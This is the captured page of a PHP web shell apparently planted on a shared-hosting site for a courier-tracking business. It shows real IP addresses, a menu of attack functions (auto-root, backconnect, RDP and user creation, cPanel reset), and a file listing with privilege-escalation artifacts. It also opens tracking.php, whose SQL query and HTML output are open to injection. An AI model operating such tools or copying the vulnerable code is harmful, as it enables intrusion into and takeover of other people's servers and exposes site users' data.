Linux server64.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.115.120 | : 216.73.216.96
Cant Read [ /etc/named.conf ]
5.6.40
midwsfoc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
midwsfoc /
swift-xpc.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
.htaccess
257
B
-rw-r--r--
.index.php
1.62
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
01swiftxpress.delivery.zip
36.2
MB
-rw-r--r--
about.php
3.25
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact.php
5.82
KB
-rw-r--r--
error_log
631.98
KB
-rw-r--r--
functions.php
2.32
KB
-rw-r--r--
good.php
7.71
KB
-rw-r--r--
google03588a098ee20279.html
53
B
-rw-r--r--
google18372def94796f27.html
53
B
-rw-r--r--
google298e9b430a229453.html
53
B
-rw-r--r--
google3b611924d8a868ba.html
53
B
-rw-r--r--
google537e082bbfe294fa.html
53
B
-rw-r--r--
google5cce3dda03c5ea79.html
53
B
-rw-r--r--
google7bf4c1896906723d.html
53
B
-rw-r--r--
googlea27f26ef3c16ef21.html
53
B
-rw-r--r--
googlec1ea6bf266124648.html
53
B
-rw-r--r--
googlecc879ae06689d91a.html
53
B
-rw-r--r--
googled67911d9ca645e70.html
53
B
-rw-r--r--
googlee800147306ef23ee.html
53
B
-rw-r--r--
googlef0055a8384a88b01.html
53
B
-rw-r--r--
index.php
7.71
KB
-r--r--r--
index3.php
51.7
KB
-rw-r--r--
infox.txt
169
B
-rw-r--r--
phpinfo.php
25
B
-rw-r--r--
privacy.php
6.64
KB
-rw-r--r--
services.php
5.5
KB
-rw-r--r--
terms.php
7.4
KB
-rw-r--r--
tracking.php
8.27
KB
-rw-r--r--
wp-site.php
9.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tracking.php
<?php include("includes/header.php"); include("includes/navbar.php"); //include("includes/main_content.php"); ?> <div class="slider-area "> <div class="single-slider hero-overly slider-height2 d-flex align-items-center" data-background="assets/img/hero/about.jpg"> <div class="container"> <div class="row"> <div class="col-xl-12"> <div class="hero-cap"> <h2>Tracking</h2> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="./">Home</a></li> <li class="breadcrumb-item"><a href="#">Tracking</a></li> </ol> </nav> </div> </div> </div> </div> </div> </div> <!-- slider Area End--> <!--? About Area Start --> <div class="about-low-area section-padding30"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-12"> <div class="about-caption mb-50"> <!-- Section Tittle --> <div class="section-tittle mb-35"> <?php if(isset($_GET['track'])){?> <link rel="stylesheet" href="assets/lobibox/font-awesome/css/font-awesome.min.css"/> <link rel="stylesheet" href="assets/lobibox/dist/css/lobibox.css"/> <script src="assets/js/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ var inter; Lobibox.progress({ title: 'Please wait', label: 'Loading your tracking page...', progressTpl: '<div class="progress lobibox-progress-outer">\n\ <div class="progress-bar progress-bar-success progress-bar-striped lobibox-progress-element" data-role="progress-text" role="progressbar"></div>\n\ </div>', progressCompleted: function () { window.location.href = "tracking.php"; }, onShow: function ($this) { var i = 0; inter = setInterval(function () { window.console.log(i); if (i > 100) { clearInterval(inter); } i = i + 0.2; $this.setProgress(i); }, 100 / 40); }, closed: function () { inter = clearInterval(inter); document.getElementById('page').innerHTML='<br/>'; } }); }); </script> <script src="assets/lobibox/lib/jquery.1.11.min.js"></script> <script src="assets/lobibox/js/lobibox.js"></script> <script src="assets/lobibox/demo/demo.js"></script> <?php }?> <h3> <b>STAY ON TRACK</b> <br/></h3> Enter your tracking code below and click the "TRACK" button to find out exactly where your cargo is right now and when it will arrive at its final destination. <hr/> <form role="form" method="post" action="" enctype="multipart/form-data"> <!-- text input --> <div class="form-group"> <label>Tracking ID:</label> <input type="text" name="search_id" class="form-control" placeholder="" value=""> </div> <br/> <div class="form-group"> <button class="btn bg-navy-blue text-white" type="submit" id="click" name="submit"> TRACK <i class="icofont-search"></i></button> </div> </form> <?php if(isset($_POST['submit'])){ $search_id = mysql_escape_string($_POST['search_id']); $search_id = trim($search_id); $sql = "SELECT * FROM posts WHERE tracking_id='$search_id'"; $run= mysqli_query($con, $sql); $numrows =mysqli_num_rows($run); if($numrows==0){ echo '<center><h3 style="color:gold">Tracking ID does not exist..</h3></center><br/>'; } else{ while($row= mysqli_fetch_array($run)){ $id = $row['id']; $s_fullname = mysql_escape_string($row['s_fullname']); $s_phone = mysql_escape_string($row['s_phone']); $s_email = mysql_escape_string($row['s_email']); $s_address = mysql_escape_string($row['s_address']); $fullname = mysql_escape_string($row['fullname']); $phone = mysql_escape_string($row['phone']); $email = mysql_escape_string($row['email']); $phone = mysql_escape_string($row['phone']); $address = mysql_escape_string($row['address']); $time = $row['time']; $mode = $row['mode']; $type = $row['type']; $weight = $row['weight']; $comments = $row['comments']; $status = $row['status']; $origin = $row['origin']; $packages = $row['packages']; $destination = mysql_escape_string($row['destination']); $tracking_id = mysql_escape_string($row['tracking_id']); $current_location = mysql_escape_string($row['current_location']); $payment = mysql_escape_string($row['payment']); ?> <h3 style="color:gold">SHIPPING ITEM</h3> <table class="table table-bordered"> <br/><tr><span id="partmain">SHIPMENT ID</span> <td>Tracking ID: <b> <?php echo $tracking_id?></b></td> </tr> </table> <br/> <table class="table table-bordered tex-green"> <br/><tr><span id="part">PAYMENT</span> <td>Status: <b><?php echo $payment?></b></td> </tr> </table> <?php if($current_location!=""){?> <table class="table table-bordered"> <tr><span id="part">Current Location</span><!-- <td>current_location: <b> <?php echo $current_location?></b></td> --> </tr> <div class="gmap_canvas"><iframe width="500" height="300" id="gmap_canvas" src="https://maps.google.com/maps?q=<?php echo $current_location?>&t=&z=13&ie=UTF8&iwloc=&output=embed" frameborder="0" scrolling="no" marginheight="0" marginwidth="0"></iframe><a href="https://www.embedgooglemap.net"></a></div> <style>.mapouter{position:relative;text-align:right;height:auto;width:auto;}.gmap_canvas {overflow:hidden;background:none!important;height: auto;width:auto;}</style><br/> </table> <?php }?> <table class="table table-bordered"> <tr><span id="part">SENDER DETAILS</span> <td>Sender fullname: <b> <?php echo $s_fullname?></b></td> <td>Sender phone: <b> <?php echo $s_phone?></b></td> </tr> <tr/> <td>Sender email: <b> <?php echo $s_email?></b></td> <td>Sender address: <b> <?php echo $s_address?></td> </tr> </table> <table class="table table-bordered"> <br/><tr><span id="part">RECIEVER DETAILS</span> <td>Reciever fullname: <b> <?php echo $fullname?></b></td> <td>Reciever phone: <b> <?php echo $phone?></b></td> </tr> <tr/> <td>Reciever email: <b> <?php echo $email?></b></td> <td>Reciever address: <b> <?php echo $address?></td> </tr> <br/> </table> <table class="table table-bordered"> <br/><tr><span id="part">SHIPMENT DETAILS</span> <td>Mode: <b> <?php echo $mode?></b></td> <td>Time: <b> <?php echo $time?></b></td> </tr> <tr/> <td>Origin: <b> <?php echo $origin?></b></td> <td>Packages: <b> <?php echo $packages?></b></td> </tr> <tr/> <td>Type: <b> <?php echo $type?></b></td> <td>Weight: <b> <?php echo $weight?></b></td> </tr> <br/> </table> <table class="table table-bordered"> <br/><tr><span id="part">SHIPMENT STATUS</span> <td>Status: <b> <?php echo $status?></b></td> <td>Comments: <b> <?php echo $comments?></td> </tr> </table> <?php } } } ?> <br/> <br/> <br/> </div> </div> </b> </td> </tr> </table> </b> </td> </table> </b> </td> </table> </div> </div> </div> </div> </div> </div> <?php include("includes/footer.php"); ?>
Close